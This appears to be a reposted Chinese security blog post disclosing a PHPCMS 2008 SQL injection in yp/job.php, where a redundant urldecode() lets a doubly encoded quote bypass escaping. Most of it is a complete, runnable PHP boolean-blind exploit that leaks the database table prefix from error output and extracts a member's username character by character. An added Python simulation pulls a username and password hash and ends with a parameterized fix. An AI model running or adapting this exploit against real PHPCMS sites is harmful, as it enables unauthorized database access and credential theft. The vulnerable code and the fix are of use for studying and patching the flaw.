
Phpcms2008 0day Vulnerability and Exploit

2012-10-06

The vulnerability is in lines 17-34 of yp/job.php, and the urldecode() call is the culprit. The request parameter has already been URL-decoded once by the web server before the script runs (and, as the exploit's %2527 encoding shows, a single quote at that stage gets escaped), so decoding it a second time turns a doubly encoded %2527 into a bare single quote, which is then concatenated straight into the WHERE clause. The code:

==========================================================
switch($action) {
    case 'list':
        $catid = intval($catid);
        $head['keywords'] .= '职位列表';
        $head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];
        $head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];
        $templateid = 'job_list';
        if($inputtime) $time = time() - 3600*$inputtime*24;
        else $time = 0;
        if($time < 0) $time = 0;
        $where = "j.updatetime >= '{$time}' ";
        $genre = urldecode($genre);                            // second decode: %2527 -> %27 -> ' after escaping already ran
        if($station) $where .= "AND j.station = '{$station}' ";
        if($genre) $where .= "AND c.genre = '{$genre}' ";        // the restored quote lands unescaped in the SQL string
        if(!trim($where)) $where = '1';
        break;
=================================================================

Exploit. It is boolean-blind: the oracle is whether the job list renders (the script greps the response for content before a closing </span>). It first leaks the table prefix from the MySQL error produced by a lone %2527, then finds the length of the target column and brute-forces it one character at a time. As posted, the script is cut off at its start (the beginning of the usage text) and at its end (the extraction loops); the argument handling and the loop marked below are filled in so that it runs.

=================================================================
<?php
// PhpCms 2008 (job.php $genre) Blind SQL Injection Exploit, by My5t3ry (http://hi.baidu.com/netstart)
if ($argc < 4) {
    echo "\n[+] Usage: php ".$argv[0]." <host> <path> <userid>".
         "\n[+] Ex. : php ".$argv[0]." localhost /yp 1".
         "\n\n";
    exit();
}
$hostname = $argv[1];   // argument handling reconstructed from the usage example above
$path     = $argv[2];
$userid   = $argv[3];

function request($hostname, $path, $query)
{
    $fp = fsockopen($hostname, 80);
    if (!$fp) die(" Could not connect to {$hostname}\n");
    $request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n".
               "Host: {$hostname}\r\n".
               "Connection: Close\r\n\r\n";
    fputs($fp, $request);
    $reply = '';
    while (!feof($fp)) $reply .= fgets($fp, 1024);
    fclose($fp);
    return $reply;
}

// Boolean oracle: true when the job list is non-empty, i.e. the injected condition held.
function exploit($hostname, $path, $uid, $fld, $chr, $pos)
{
    global $prefix;
    $chr = ord($chr);
    $query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";
    $query = str_replace(" ", "%20", $query);
    $query = str_replace("'", "%2527", $query);   // double-encode the quote: survives the first decode and the escaping, restored by urldecode()
    $outcode = request($hostname, $path, $query);
    preg_match("/(.+)<\/span>/", $outcode, $x);
    return isset($x[1]) && strlen(trim($x[1])) != 0;
}

echo "\n--------------------------------------------------------------------------------\n";
echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n--------------------------------------------------------------------------------\n";

// A lone unescaped quote makes the query fail; the displayed MySQL error leaks the table prefix.
echo "[~]trying to get pre...\n";
$query   = "x%2527";
$outcode = request($hostname, $path, $query);
preg_match('/FROM `(.+)yp_job/i', $outcode, $match);   // the original's "e" modifier is not valid for preg_match and is dropped
if (isset($match[1]) && $match[1]) {
    $prefix = $match[1];
    echo '[+]Good Job! Got the prefix -> '.$prefix."\n";
} else {
    die(" Exploit failed...\n");
}

echo "[~]trying to get username length...\n";
$length = 0;
for ($i = 1; $i <= 20; $i++) {
    $query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2";
    $query = str_replace(" ", "%20", $query);
    $query = str_replace("'", "%2527", $query);
    $outcode = request($hostname, $path, $query);
    preg_match("/(.+)<\/span>/", $outcode, $x);
    if (isset($x[1]) && strlen(trim($x[1])) != 0) { $length = $i; break; }
}
if ($length == 0) die(" Exploit failed...\n");
echo "[+]length -> ".$length;

echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";
// The post is cut off here. This loop is reconstructed from the exploit() helper defined above;
// the post shows the start of a second, also truncated, loop that is not reproduced.
$pos = 1;
while ($pos <= $length) {
    for ($c = 32; $c < 127; $c++) {
        if (exploit($hostname, $path, $userid, 'username', chr($c), $pos)) {
            echo chr($c);
            break;
        }
    }
    $pos++;
}
echo "\n";
=================================================================
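The following is an added example, not code from the original post or from PHPCMS. It models the job.php flaw end to end against an in-memory SQLite table standing in for the member table: the parameter is decoded once by the web server, escaped by the framework (an assumption, implied by the exploit's use of %2527 rather than %27), then decoded again by urldecode() and concatenated into the WHERE clause, so a doubly encoded quote reaches the SQL unescaped. It then runs the same boolean-blind length probe and per-character extraction as the PHP exploit, and ends with the hardened form (decode once, bind parameters). The table prefix, column names and sample rows are constructed for the example; SQLite's unicode()/substr() stand in for MySQL's ASCII()/SUBSTRING(), and the category join is simplified to a genre column on the job table.

```python
"""Added example (not code from the original post or from PHPCMS): the
double-decode bypass in job.php and the boolean-blind extraction it enables,
run against constructed sample data in SQLite."""
import sqlite3
from urllib.parse import unquote

PREFIX = "phpcms_"   # assumed; the real exploit scrapes it from a leaked SQL error


def build_db():
    """Constructed sample data: one member row and one job row."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE {PREFIX}member (userid INTEGER, username TEXT, password TEXT);
        INSERT INTO {PREFIX}member VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
        CREATE TABLE {PREFIX}job (station INTEGER, genre TEXT, updatetime INTEGER);
        INSERT INTO {PREFIX}job VALUES (4, 'it', 1349481600);
    """)
    return db


def escape_quotes(s):
    """Assumed framework-level escaping of request parameters; runs once, before job.php."""
    return s.replace("'", "''")


def job_list_query(raw_genre, station=4):
    """Vulnerable pipeline: server decode -> escape -> urldecode() again -> string concat."""
    genre = unquote(escape_quotes(unquote(raw_genre)))
    return (f"SELECT COUNT(*) FROM {PREFIX}job j "
            f"WHERE j.updatetime >= '0' AND j.station = '{station}' AND j.genre = '{genre}'")


def oracle(db, raw_genre):
    """True when the job list would be non-empty (what the exploit greps for in the HTML)."""
    try:
        return db.execute(job_list_query(raw_genre)).fetchone()[0] > 0
    except sqlite3.Error:
        return False


def encode_single(fragment):
    """Ordinary URL encoding: the quote is escaped and the injection is neutralised."""
    return fragment.replace(" ", "%20").replace("'", "%27")


def encode_double(fragment):
    """The exploit's encoding: %2527 survives decode+escape, urldecode() restores the quote."""
    return fragment.replace(" ", "%20").replace("'", "%2527")


def field_length(db, field, uid, limit=64):
    """Same length probe as the exploit's first loop."""
    for n in range(1, limit + 1):
        probe = f"x' OR length((select {field} from {PREFIX}member where userid='{uid}'))={n} OR '1'='2"
        if oracle(db, encode_double(probe)):
            return n
    return None


def extract_field(db, field, uid):
    """Character-by-character boolean-blind extraction, as exploit() does per position."""
    n = field_length(db, field, uid)
    if n is None:
        return None
    out = ""
    for pos in range(1, n + 1):
        for c in range(32, 127):
            probe = (f"x' OR unicode(substr((select {field} from {PREFIX}member "
                     f"where userid='{uid}'),{pos},1))={c} OR '1'='2")
            if oracle(db, encode_double(probe)):
                out += chr(c)
                break
    return out


def oracle_safe(db, raw_genre, station=4):
    """Hardened form: decode once, no urldecode() on already-decoded input, bound parameters."""
    genre = unquote(raw_genre)
    sql = (f"SELECT COUNT(*) FROM {PREFIX}job j "
           "WHERE j.updatetime >= ? AND j.station = ? AND j.genre = ?")
    return db.execute(sql, (0, station, genre)).fetchone()[0] > 0


if __name__ == "__main__":
    db = build_db()
    tautology = "x' OR '1'='1"
    print("single-encoded quote injects:", oracle(db, encode_single(tautology)))
    print("double-encoded quote injects:", oracle(db, encode_double(tautology)))
    print("username:", extract_field(db, "username", 1))
    print("password:", extract_field(db, "password", 1))
    print("hardened query, exploit payload:", oracle_safe(db, encode_double(tautology)))
```

With the single-encoded payload the escaping step turns the quote into a harmless literal and the oracle stays false; with the double-encoded payload the escaping step sees no quote at all, urldecode() then produces one, and the same oracle flips to true, which is all the extraction loop needs. The hardened version keeps the exploit payload as plain data because the value is bound rather than concatenated; dropping the redundant urldecode() alone would not be enough if string concatenation remained.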

  • Posted by Asp免杀大马发布; please credit the source when reprinting: http://www.mumaasp.com/109.html
  • Categories: Phpcms2008, phpcms vulnerabilities | Tags: | 1,605 views
